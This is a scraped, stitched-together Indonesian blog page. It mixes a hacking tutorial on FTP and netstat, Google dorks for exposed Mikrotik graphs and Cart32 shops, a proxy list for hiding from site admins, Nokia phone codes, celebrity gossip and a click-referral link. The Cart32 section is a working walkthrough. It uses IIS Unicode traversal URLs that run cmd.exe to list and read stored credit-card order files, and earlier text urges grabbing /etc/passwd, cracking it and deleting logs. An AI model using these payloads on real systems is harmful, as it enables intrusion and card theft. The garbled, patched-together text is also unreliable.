Reply from 127.0.0.1: bytes=32 time<10ms ttl="128" bytes="32" ttl="128" bytes="32" ttl="128" bytes="32" ttl="128" sent =" 4," received =" 4," lost =" 0" minimum =" 0ms," maximum =" 0ms," average =" 0ms" bytes="32" time="3448ms" ttl="54" bytes="32" time="2276ms" ttl="54" bytes="32" time="1799ms" ttl="54" bytes="32" time="2850ms" ttl="54" sent =" 4," received =" 4," lost =" 0" minimum =" 1799ms," maximum =" 3448ms," average =" 2593ms">pwd
/etcme
2. 'lcd' to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. 'cd' to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. 'mput' to send multiple files to remote machine.
contohnya. ftp>mput *.*
sends all files from C:\windows to /etc
5. 'mget' to get multiple files from remote machine.
contohnya. ftp>mget *.*
gets all files from /etc to C:\windows
6. 'open' to establish a connection with remote host.
contohnya. ftp>open www.target.com
7. 'bye' closes the connection and quits from ftp

Untuk perintah lainnya dari ftp silakan lihat help mereka.

Sekarang pada yang port FTP (prot 21) adalah membuka www.nosecurity.com. Seorang hacker akan terhubung ke situs tersebut menggunakan ftp www.nosecurity.com pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa www.nosecurity.com menggunakan linux server, maka hacker tersebut akan mengtikkan perintah get /etc/apsswd untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.



5. netstat

Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan www.target.com pada port 23 (telnet) maka port tersebut seharusnya terbuka pada www.target.com. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan netstat pada dos prompt memberikan:


Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi a dan n. Opsi a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik netstat a pada command prompt.


Active Connections

Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED

Proto menyatakan nama protocol tersebut, localaddress memberikan ipaddress kita dan port yang terbuka. Foreign Address menyatkaan ipaddress dengan namor port yang terhubung ke kita. State menyatakan pernyataan saat ini jika suatu koneksi established atau listening atau hanya waiting .

Sebagai contoh jika saya membuka www.yahoo.com maka saat saya menjalankan netstat a saya akan mendapatkan masukan seperti ini:

"TCP 203.43.50.81:2034 www.yahoo.com:80 ESTABLISHED"

Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80


*************
Newbie tip: Dengan cara ini anda bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan netstat an dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan netstat an dan anda akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut.
*************


Menemukan dengan mudah MRTG dari graphing mikrotik
MRTG adalah suatu aplikasi yg dibuat untuk melihat besarnya traffic yang terjadi pada saat pemakaian internet. Itu digambarkan dalam bentuk grafik.

Mikrotik memiliki fasilitas tersebut namanya tool graphing, idealnya MRTG mikrotik di batesi agar tidak bisa dilihat sembarang orang. Mungkin bisa di tambahkan rule allow acces IP mana saja yang diijinkan untuk melihatnya.

Kita dapat menemukan dengan mudah MRTG dari graphing mikrotik yang tidak di filter, caranya:

buka www.google.co.id
ketikkan key word = "mikrotik intitle:graphing"
pilih seach the web untuk semua web/IP yang ingin dicari
atau page from Indonesia untuk hanya web/IP indonesia saja
FREE PROXY List ... cucok buat macem2 kegunaan ^^
source: from nowwayhome email send to me ^^ thanks guys

Demi menjaga IP address kita dari polisi web ... ups ^^ maksudnya dari admin n
pemilik Ip yang akan kita intip ^^ ada baiknya kita redirect dulu alamat IP kita
supaya nggak nongol sembarangan ^^ .... mudah2an bisa membantu, berikut list free
proxy yang berhasil ai capture:

-http://www.proxy4free.com
-http://www.allproxies.com
-http://www.proxymania.com
-http://www.freeproxysite.com
-http://www.freeproxy.ca
-http://www.hidemyass.com
-http://www.freeproxy.ru
-http://www.proxyblind.org
-http://www.anonymouse.org/anonwww.html
-http://www.theproxyfree.com
-http://www.1freeproxy.com
-http://www.sweetproxies.com
-http://www.avoidthefilter.com
-http://www.proxy-list.org
-http://www.freeproxyserver.net
-http://www.freshproxy.org/
-http://www.turbohide.com
-http://www.freeproxytemplates.com
-http://www.oddproxy.com
-http://www.hiddencloak.com
-http://www.ghacks.net/2006/08/04/free-web-proxy-list/


sumber dalam negeri:

Blognya om herry nugraha
http://borneo.blogsome.com/2007/04/30/daftar-free-proxy-anonymous-populer/


yach segitu dulu dech ^^ kalo mau lebih banyak search aja lewat Google ya^^

Reset Handphone

*#30# : Menampilkan “private number” yang menghubungi Anda.

*#73# : Mereset timer ponsel dan skor game (pada beberapa ponsel)

*#7780# : Mengembalikan ke setting pabrik

*#2820# : Alamat IP perangkat Bluetooth (hanya untuk yang memiliki fitur bluetooth)

xx# : Akses cepat ke nama/ nomor telepon di phone book ponsel

*#06# : Menampilkan nomor IMEI (International Mobile Equipment Identity)

*#0000# : Menampilkan versi software ponsel. Baris pertama menunjukkan versi software ponsel, baris kedua menunjukkan tanggal pembuatan software, baris ketiga menunjukkan tipe kompresi yang digunakan.

*#9999# : Kode alternatif jika *#0000# tidak bekerja.

*#21# : Mengecek nomor pengalihan ”All Calls” yang digunakan

*#2640# : Menampilkan kode keamanan ponsel yang digunakan (bila masih menggunakan standar kode tidak akan terlihat)

*#43# : Mengecek status call waiting

*#61# : Mengecek nomor pemanggil yang dialihkan ketika Anda tidak menjawab (Jika anda mengaktifkan pengalihan panggilan/ call divert)

*#62# : Mengecek nomor pemanggil yang dialihkan ketika Anda di luar jangkauan (Jika anda mengaktifkan pengalihan panggilan/ call divert)

*#67# : Mengecek nomor pemanggil yang dialihkan ketika Anda sedang sibuk (Jika anda mengaktifkan pengalihan panggilan/ call divert)

**21*number# : Menghidupkan pengalihan ”All calls” pada nomor yang diisi.

**61*number# : Menghidupkan pengalihan ”No Reply” pada nomor yang diisi.

**67*number# : Menghidupkan pengalihan ”On Busy” pada nomor yang diisi.

*#67705646# : Mengganti logo operator pada Nokia 3310 dan 3330

*#746025625# : Menampilkan status SIM clock. Jika ponsel anda mendukung fitur penghemat energi, akan keluar tulisan “SIM Clock Stop Allowed”, artinya Anda akan mendapatkan waktu standby yang lebih panjang.

*#3370# : Mengaktifkan Enhanced Full Rated Codec (EFR). Ponsel Nokia Anda akan memakai kualitas suara terbaik, namun fitur ini memerlukan energi lebih sehingga sedikit menguras daya baterai. Catatan: kode ini tidak berlaku di ponsel-ponsel symbian.

#3370# : Menonaktifkan Enhanced Full Rated Codec (EFR).

*#4720# : Mengaktifkan Half Rated Codec. Ponsel Nokia Anda akan memakai kualitas suara lebih rendah, sehingga bisa menghemat energi baterai sekitar 30%.

#4720# : Menonaktifkan Half Rated Codec.

*#7760# : Menampilkan kode pabrikan (untuk sebagian besar ponsel tipe lama).

Crading $ Crack

1. Sama seperti diatas, Cari target dahulu di google.com dgn keyword allinurl:/cart32.exe/

2. Misalkan kita mendapat target dg url:

http://www.contoh.com/scripts/cart32.exe/blablabla , maka:

3. Ganti url tsb menjadi ->


http://www.contoh.com/scripts/
4. Modifikasi url tsb dg memasukkan unicode dibelakangnya -> http://www.contoh.com/scripts/
5. Contoh unicode utk path /scripts/ : –>
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
Sedangkan utk path /cgi-bin/ ->
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
6. Sebagai contoh, pada url diatas menggunakan path /scripts/ maka diubah menjadi http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
7. string diakhir unicode dg keterangan dir+c:\ maksudnya kita sedang berada dan melist directory c server target!
8. Untuk masuk ke directory cc’s ganti perintahnya unicode dgn -> http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\
9. Kita akan output list dari file .32 sebagai contoh namanya WRBURNS-001065.c32
10. Nah.., utk melihat filenya dg unicode http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\WRBURNS-001065.c32
11. Kalo tidak berhasil, kita masih bisa mencobanya dengan unicode yg laennya.
12. Ok, semoga berhasil, materi ke-2 Selesai.
Michael Jackson Might Die: For real this time says Intouch Mag

StumbleUpon Digg Reddit Mixx del.icio.us MySpace Fark Facebook TwitThis Propeller Wikio Yahoo! Buzz

michael-jackson

**UPDATE June 09: Michael Jackson dead **

Intouch Weekly print edition are running a story that Michael Jackson is so sick, with a rare genetic disease that he might die. For realz, this time, not faking it to get out of some sort of court appearance, jail cell etc.

According to Intouch Michael has the rare genetic disease Alpha-1 antitrypsin deficiency.

award-winning investigative journalist Ian Halperin tells In Touch that he believes that the King of Pop is fighting for is life. “Michael has a very severe lung condition called Alpha-1 antitrypsin deficiency,” Halperin, a New York Times best-selling author, tells In Touch exclusively. “He’s had it for years but it’s gotten worse. He needs a lung transplant but may be too weak to go through with it. He also has emphysema and chronic gastrointestinal bleeding, which his doctors have had a lot of trouble stopping. It’s the bleeding that is the most problematic part. It could kill him.”

Because this genetic disease is so rare - Alpha-1 antitrypsin deficiency affects just 1 in 5,000 Americans - it’s been difficult to treat, says Halperin. “For years, Michael has been working with his own doctors to make sure his condition doesn’t progress. He has been on many medications that have stabilized him.” But as the disease has progressed, Halperin says that the pop star’s quality of life has diminished. “He can barely speak,” says Halperin. “Also, the vision in his left eye is 95 percent gone.”

Michael Jackson’s brother Jermaine Jackson confirmed to Foxnews that Michael was desperately ill saying. “He’s not doing so well right now. This isn’t a good time.”

I guess that puts paid to the much talked about Jackson Five tour.

See here for more information on the disease.

I can see the celebrity fundraising specials now, although it does explain a bit
http://ngebux.com/?r=sigitpermana

Ini link yang tiap kali elu ngeklik bakal dibayar... cuma sayang sebelum elu dapet 50rb iklannya dibatesin cuma 3